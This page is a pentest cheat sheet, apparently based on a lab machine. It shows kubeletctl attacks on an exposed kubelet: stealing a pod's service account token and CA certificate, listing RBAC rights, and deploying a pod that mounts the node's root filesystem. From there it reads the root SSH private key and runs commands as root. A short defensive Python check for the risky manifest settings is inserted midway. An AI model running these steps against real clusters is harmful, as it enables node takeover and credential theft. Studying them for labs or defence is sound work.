Kubernetes
Use the tool kubeletctl to extract the service account token and CA certificate (ca.crt) that are mounted into a running pod.
Sample Exploitation
Extract Tokens
$ kubeletctl -i --server 10.129.10.11 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx | tee -a k8.token
eyJhbGciOiJSUzI1NiIsImtpZC...SNIP...UfT3OKQH6Sdw
Extract Certificates
$ kubeletctl --server 10.129.10.11 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx | tee -a ca.crt
-----BEGIN CERTIFICATE-----
MIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p
<SNIP>
MhxgN4lKI0zpxFBTpIwJ3iZemSfh3pY2UqX03ju4TreksGMkX/hZ2NyIMrKDpolD
602eXnhZAL3+dA==
-----END CERTIFICATE-----
List privileges
$ export token=`cat k8.token`
$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.10.11:6443 auth can-i --list
Resources                                       Non-Resource URLs   Resource Names   Verbs
selfsubjectaccessreviews.authorization.k8s.io   []                  []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                  []               [create]
pods                                            []                  []               [get create list]
...SNIP...
Ignore the selfsubject* entries, which every authenticated account has; the interesting finding is that this service account can get, create, and list pods.
Create a pod YAML (privesc.yaml)
apiVersion: v1
kind: Pod
metadata:
  name: privesc
  namespace: default
spec:
  containers:
  - name: privesc
    image: nginx:1.14.2
    volumeMounts:
    - mountPath: /root
      name: mount-root-into-mnt
  volumes:
  - name: mount-root-into-mnt
    hostPath:
      path: /
  automountServiceAccountToken: true
  hostNetwork: true
Create a new pod
$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.96.98:6443 apply -f privesc.yaml
pod/privesc created
$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.96.98:6443 get pods
NAME      READY   STATUS    RESTARTS   AGE
nginx     1/1     Running   0          23m
privesc   1/1     Running   0          12s
Extract the node's root SSH key (the host filesystem / is mounted at /root inside the pod, so the node's /root/.ssh/id_rsa appears at /root/root/.ssh/id_rsa)
$ kubeletctl --server 10.129.10.11 exec "cat /root/root/.ssh/id_rsa" -p privesc -c privesc
-----BEGIN OPENSSH PRIVATE KEY-----
...SNIP...
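As an added defender-side example that is not part of these notes: an admission-style check that flags the Pod spec settings the privesc manifest above depends on (a hostPath mount of /, hostNetwork, and an auto-mounted service account token), and, going slightly beyond the page, hostPID and privileged containers. The manifest dict mirrors the page's privesc.yaml; the hardened manifest and the names PRIVESC_MANIFEST, HARDENED_MANIFEST and find_risky_settings are this example's own.

```python
# Added example (names are this example's own, not kubeletctl's or Kubernetes'). Flags
# the Pod spec settings the privesc manifest above depends on, plus hostPID/privileged.

# Constructed from the page's privesc.yaml, as a Python dict with the same fields.
PRIVESC_MANIFEST = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "privesc", "namespace": "default"},
    "spec": {
        "containers": [{
            "name": "privesc", "image": "nginx:1.14.2",
            "volumeMounts": [{"mountPath": "/root", "name": "mount-root-into-mnt"}],
        }],
        "volumes": [{"name": "mount-root-into-mnt", "hostPath": {"path": "/"}}],
        "automountServiceAccountToken": True,
        "hostNetwork": True,
    },
}

# Constructed: the same image without any node-reaching settings or a mounted token.
HARDENED_MANIFEST = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "web", "namespace": "default"},
    "spec": {
        "containers": [{"name": "web", "image": "nginx:1.14.2"}],
        "automountServiceAccountToken": False,
    },
}


def find_risky_settings(manifest):
    """Return one finding per node-reaching or credential-carrying setting; [] means pass."""
    findings = []
    spec = manifest.get("spec", {})
    if spec.get("hostNetwork"):
        findings.append("hostNetwork: pod shares the node's network namespace")
    if spec.get("hostPID"):
        findings.append("hostPID: pod can see and signal node processes")
    # Kubernetes mounts the token by default unless the pod or ServiceAccount opts out.
    if spec.get("automountServiceAccountToken", True):
        findings.append("automountServiceAccountToken: service account token is mounted")
    # Map hostPath volumes by name so each container mount is traced to a node path.
    host_paths = {v["name"]: v["hostPath"]["path"]
                  for v in spec.get("volumes", []) if "hostPath" in v}
    for c in spec.get("containers", []):
        if c.get("securityContext", {}).get("privileged"):
            findings.append(f"{c['name']}: privileged container")
        for m in c.get("volumeMounts", []):
            if m["name"] in host_paths:
                findings.append(f"{c['name']}: hostPath {host_paths[m['name']]} at {m['mountPath']}")
    return findings
```

Run against PRIVESC_MANIFEST the check reports the hostNetwork, token mount and hostPath findings; HARDENED_MANIFEST passes with no findings.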
KubeletCTL Commands
Extract pods
$ kubeletctl -i --server 10.129.10.11 pods
┌─────────────────────────────────────────────────────────┐
│                    Pods from Kubelet                    │
├───┬──────────────────────────┬─────────────┬────────────┤
│   │ POD                      │ NAMESPACE   │ CONTAINERS │
├───┼──────────────────────────┼─────────────┼────────────┤
│ 1 │ coredns-78fcd69978-zbwf9 │ kube-system │ coredns    │
├───┼──────────────────────────┼─────────────┼────────────┤
│ 2 │ nginx                    │ default     │ nginx      │
├───┼──────────────────────────┼─────────────┼────────────┤
│ 3 │ etcd-steamcloud          │ kube-system │ etcd       │
├───┼──────────────────────────┼─────────────┼────────────┤
Scan pods for RCE vulnerability (which pods allow command execution through the kubelet API)
$ kubeletctl -i --server 10.129.10.11 scan rce
┌─────────────────────────────────────────────────────────────────────┐
│                  Node with pods vulnerable to RCE                   │
├───┬──────────────┬─────────────────┬─────────────┬────────────┬─────┤
│   │ NODE IP      │ PODS            │ NAMESPACE   │ CONTAINERS │ RCE │
├───┼──────────────┼─────────────────┼─────────────┼────────────┼─────┤
│   │              │                 │             │            │ RUN │
├───┼──────────────┼─────────────────┼─────────────┼────────────┼─────┤
│ 1 │ 10.129.10.11 │ nginx           │ default     │ nginx      │  +  │
├───┼──────────────┼─────────────────┼─────────────┼────────────┼─────┤
│ 2 │              │ etcd-steamcloud │ kube-system │ etcd       │  -  │
├───┼──────────────┼─────────────────┼─────────────┼────────────┼─────┤
Execute Commands
$ kubeletctl -i --server 10.129.10.11 exec "id" -p nginx -c nginx
uid=0(root) gid=0(root) groups=0(root)